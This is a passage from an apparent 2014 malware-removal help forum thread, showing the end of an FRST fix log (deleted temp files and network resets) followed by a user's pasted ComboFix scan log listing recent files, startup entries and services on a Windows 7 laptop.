"C:\windows\SysWOW64\00032327.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032523.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014946.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003015.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002113.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023823.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023071.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014825.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010889.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010756.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018636.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009161.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030454.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030447.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028745.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028716.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026816.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026777.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024578.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023986.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023973.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016512.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015573.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015155.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00005021.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002866.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031673.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030319.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024078.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023996.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010089.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009930.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002306.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031115.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029658.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025608.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024626.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00022929.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021311.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016541.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016118.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014977.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014643.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012646.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002161.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002082.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032439.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031960.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031865.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025184.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023329.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016944.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011840.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004966.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002237.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031322.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023811.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031705.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030925.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030333.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029577.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029464.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028973.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026798.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025951.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025547.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025444.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024393.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024370.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024084.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023805.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023491.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020799.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017673.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017555.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016571.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015890.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015350.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015141.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015006.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014883.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014818.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012859.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012623.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010496.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010309.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010053.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009413.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003548.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015984.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026299.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011277.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009894.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025667.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017619.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015674.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009558.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029666.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020219.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032474.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032274.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031833.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030039.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028825.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020776.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020695.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017098.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016156.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016039.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016021.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015665.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015633.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011924.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008712.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003225.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030809.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030106.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024466.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023278.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015279.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009040.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008942.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00001842.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030623.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018317.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012316.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032391.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029358.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025850.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024464.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023281.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021293.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017421.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015724.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014771.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012382.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012296.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011942.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011811.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011478.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009741.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008723.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002995.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00001869.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026500.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018266.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016034.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015634.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002285.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030578.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030229.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023977.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020742.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020235.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010628.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009513.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030861.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026229.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024618.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015427.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011764.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011583.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011416.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009629.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024044.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010878.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004843.tmp" => File/Directory not found.
"C:\Users\Owner\AppData\Roaming\UpdaterEX" => File/Directory not found.
"C:\windows\SysWOW64\00032443.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029794.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023882.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020540.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016943.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008696.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032387.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030524.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030400.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029911.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029532.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029136.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026392.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025130.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024350.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020723.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018485.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018399.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016036.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004936.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003093.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002479.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032336.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026404.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017573.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015873.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003273.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003145.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003124.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032536.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032139.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030934.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030827.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030618.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030117.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024058.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023025.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023002.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016419.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011739.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010722.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009744.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002782.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010043.tmp" => File/Directory not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

=========  netsh winsock reset all =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

=========  netsh int ipv4 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========

EmptyTemp: => Removed 484 KB temporary data.

The system needed a reboot.

==== End of Fixlog ====



#10 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 09:45 PM

Combofix log:

ComboFix 14-12-02.01 - Owner 12/02/2014  21:24:07.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6051.4077 [GMT -6:00]
Running from: c:\users\Owner\Desktop\ComboFix.exe
AV: Norton 360 *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton 360 *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: Norton 360 *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\Roaming
c:\windows\msdownld.tmp
.
.
(((((((((((((((((((((((((   Files Created from 2014-11-03 to 2014-12-03  )))))))))))))))))))))))))))))))
.
.
2014-12-03 03:36 . 2014-12-03 03:36 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-11-30 23:10 . 2014-12-03 03:04 -------- d-----w- C:\FRST
2014-11-22 02:28 . 2014-11-22 02:28 -------- d-----w- c:\users\Owner\AppData\Local\Macromedia
2014-11-22 01:41 . 2014-11-22 01:41 -------- d-----w- c:\users\Owner\AppData\Local\Mozilla
2014-11-20 00:39 . 2014-11-11 03:08 241152 ----a-w- c:\windows\system32\pku2u.dll
2014-11-20 00:39 . 2014-11-11 03:08 728064 ----a-w- c:\windows\system32\kerberos.dll
2014-11-20 00:39 . 2014-11-11 02:44 186880 ----a-w- c:\windows\SysWow64\pku2u.dll
2014-11-20 00:39 . 2014-11-11 02:44 550912 ----a-w- c:\windows\SysWow64\kerberos.dll
2014-11-16 14:24 . 2014-11-16 14:24 -------- d-----w- C:\N360_BACKUP
2014-11-16 13:44 . 2014-11-16 13:44 -------- d-----w- c:\program files (x86)\UEFI WinFlash
2014-11-13 01:01 . 2014-11-13 01:01 -------- d-sh--w- c:\users\Owner\AppData\Local\EmieBrowserModeList
2014-11-11 20:48 . 2014-11-05 17:56 304640 ----a-w- c:\windows\system32\generaltel.dll
2014-11-11 20:48 . 2014-11-05 17:56 228864 ----a-w- c:\windows\system32\aepdu.dll
2014-11-11 20:48 . 2014-11-05 17:52 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-11-11 20:48 . 2014-10-14 02:13 683520 ----a-w- c:\windows\system32\termsrv.dll
2014-11-11 20:48 . 2014-10-14 02:16 155064 ----a-w- c:\windows\system32\drivers\ksecpkg.sys
2014-11-11 20:48 . 2014-10-14 02:12 1460736 ----a-w- c:\windows\system32\lsasrv.dll
2014-11-11 20:48 . 2014-10-14 02:09 146432 ----a-w- c:\windows\system32\msaudite.dll
2014-11-11 20:48 . 2014-10-14 02:07 681984 ----a-w- c:\windows\system32\adtschema.dll
2014-11-11 20:48 . 2014-10-14 01:50 22016 ----a-w- c:\windows\SysWow64\secur32.dll
2014-11-11 20:48 . 2014-10-14 01:49 96768 ----a-w- c:\windows\SysWow64\sspicli.dll
2014-11-11 20:48 . 2014-10-14 01:47 146432 ----a-w- c:\windows\SysWow64\msaudite.dll
2014-11-11 20:48 . 2014-10-14 01:46 681984 ----a-w- c:\windows\SysWow64\adtschema.dll
2014-11-11 20:45 . 2014-08-21 06:43 1882624 ----a-w- c:\windows\system32\msxml3.dll
2014-11-11 20:44 . 2014-10-25 01:57 77824 ----a-w- c:\windows\system32\packager.dll
2014-11-11 20:44 . 2014-10-25 01:32 67584 ----a-w- c:\windows\SysWow64\packager.dll
2014-11-11 20:44 . 2014-10-10 00:57 3198976 ----a-w- c:\windows\system32\win32k.sys
2014-11-11 20:44 . 2014-10-14 02:13 3241984 ----a-w- c:\windows\system32\msi.dll
2014-11-11 20:44 . 2014-10-14 01:50 2363904 ----a-w- c:\windows\SysWow64\msi.dll
2014-11-11 20:44 . 2014-10-18 02:05 861696 ----a-w- c:\windows\system32\oleaut32.dll
2014-11-11 20:44 . 2014-10-18 01:33 571904 ----a-w- c:\windows\SysWow64\oleaut32.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-11-27 17:22 . 2012-04-17 22:51 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-11-27 17:22 . 2011-08-15 11:10 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-11-13 00:30 . 2011-07-18 00:47 103374192 ----a-w- c:\windows\system32\MRT.exe
2014-09-25 02:08 . 2014-10-01 19:22 371712 ----a-w- c:\windows\system32\qdvd.dll
2014-09-25 01:40 . 2014-10-01 19:22 519680 ----a-w- c:\windows\SysWow64\qdvd.dll
2014-09-24 03:39 . 2012-05-10 21:41 505416 ----a-w- c:\windows\SysWow64\msvcp71.dll
2014-09-24 03:39 . 2012-05-10 21:41 353864 ----a-w- c:\windows\SysWow64\msvcr71.dll
2014-09-09 22:11 . 2014-09-23 22:04 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-09 21:47 . 2014-09-23 22:04 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-09-04 05:23 . 2014-10-17 23:20 424448 ----a-w- c:\windows\system32\rastls.dll
2014-09-04 05:04 . 2014-10-17 23:20 372736 ----a-w- c:\windows\SysWow64\rastls.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2011-05-18 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SVPWUTIL"="c:\program files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe" [2010-11-09 532480]
"HWSetup"="c:\program files\TOSHIBA\Utilities\HWSetup.exe" [2010-03-04 423936]
"KeNotify"="c:\program files (x86)\TOSHIBA\Utilities\KeNotify.exe" [2010-08-16 34160]
"ToshibaServiceStation"="c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2010-11-29 1294712]
"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]
"HP Software Update"="c:\program files (x86)\HP\HP Software Update\HPWuSchd2.exe" [2011-05-10 49208]
"TkBellExe"="c:\program files (x86)\real\realplayer\Update\realsched.exe" [2014-09-24 296520]
.
c:\users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Best Buy pc app.lnk - c:\programdata\Best Buy pc app\ClickOnceSetup.exe "c:\programdata\Best Buy pc app\Best Buy pc app.application" [2011-2-25 15776]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RealPlayerUpdateSvc;RealPlayer Update Service;c:\program files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe;c:\program files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 intaud_WaveExtensible;Intel WiDi Audio Device;c:\windows\system32\drivers\intelaud.sys;c:\windows\SYSNATIVE\drivers\intelaud.sys [x]
R3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]
R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 SymDS;Symantec Data Store;c:\windows\system32\drivers\N360x64\1506000.020\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMDS64.SYS [x]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\N360x64\1506000.020\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMEFA64.SYS [x]
S0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\DRIVERS\thpdrv.sys;c:\windows\SYSNATIVE\DRIVERS\thpdrv.sys [x]
S0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\DRIVERS\Thpevm.SYS;c:\windows\SYSNATIVE\DRIVERS\Thpevm.SYS [x]
S0 tos_sps64;TOSHIBA tos_sps64 Service;c:\windows\system32\DRIVERS\tos_sps64.sys;c:\windows\SYSNATIVE\DRIVERS\tos_sps64.sys [x]
S1 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\BASHDefs\20141118.001\BHDrvx64.sys;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\BASHDefs\20141118.001\BHDrvx64.sys [x]
S1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\ccSetx64.sys [x]
S1 IDSVia64;IDSVia64;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\IPSDefs\20141202.001\IDSvia64.sys;c:\program files (x86)\Norton 360\NortonData\21.4.0.13\Definitions\IPSDefs\20141202.001\IDSvia64.sys [x]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\Ironx64.SYS [x]
S1 SymNetS;Symantec Network Security WFP Driver;c:\windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS;c:\windows\SYSNATIVE\Drivers\N360x64\1506000.020\SYMNETS.SYS [x]
S2 DMAgent;Intel® PROSet/Wireless WiMAX Red Bend Device Management Service;c:\program files\Intel\WiMAX\Bin\DMAgent.exe;c:\program files\Intel\WiMAX\Bin\DMAgent.exe [x]
S2 N360;Norton 360;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [x]
S2 RealNetworks Downloader Resolver Service;RealNetworks Downloader Resolver Service;c:\program files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe;c:\program files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [x]
S2 RealPlayer Cloud Service;RealPlayer Cloud Service;c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe;c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [x]
S2 RosettaStoneDaemon;RosettaStoneDaemon;c:\program files (x86)\RosettaStoneLtdServices\RosettaStoneDaemon.exe;c:\program files (x86)\RosettaStoneLtdServices\RosettaStoneDaemon.exe [x]
S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe;c:\program files\TOSHIBA\TECO\TecoService.exe [x]
S2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;c:\windows\system32\DRIVERS\TVALZFL.sys;c:\windows\SYSNATIVE\DRIVERS\TVALZFL.sys [x]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]
S2 WiMAXAppSrv;Intel® PROSet/Wireless WiMAX Service;c:\program files\Intel\WiMAX\Bin\AppSrv.exe;c:\program files\Intel\WiMAX\Bin\AppSrv.exe [x]
S3 bpenum;Intel® Centrino® WiMAX Enumerator;c:\windows\system32\DRIVERS\bpenum.sys;c:\windows\SYSNATIVE\DRIVERS\bpenum.sys [x]
S3 bpmp;Intel® Centrino® WiMAX 6050 Series;c:\windows\system32\DRIVERS\bpmp.sys;c:\windows\SYSNATIVE\DRIVERS\bpmp.sys [x]
S3 bpusb;Intel® Centrino® WiMAX 6050 Series Function Driver;c:\windows\system32\Drivers\bpusb.sys;c:\windows\SYSNATIVE\Drivers\bpusb.sys [x]
S3 CeKbFilter;CeKbFilter;c:\windows\system32\DRIVERS\CeKbFilter.sys;c:\windows\SYSNATIVE\DRIVERS\CeKbFilter.sys [x]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 iwdbus;IWD Bus Enumerator;c:\windows\system32\DRIVERS\iwdbus.sys;c:\windows\SYSNATIVE\DRIVERS\iwdbus.sys [x]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]
S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys;c:\windows\SYSNATIVE\DRIVERS\pgeffect.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
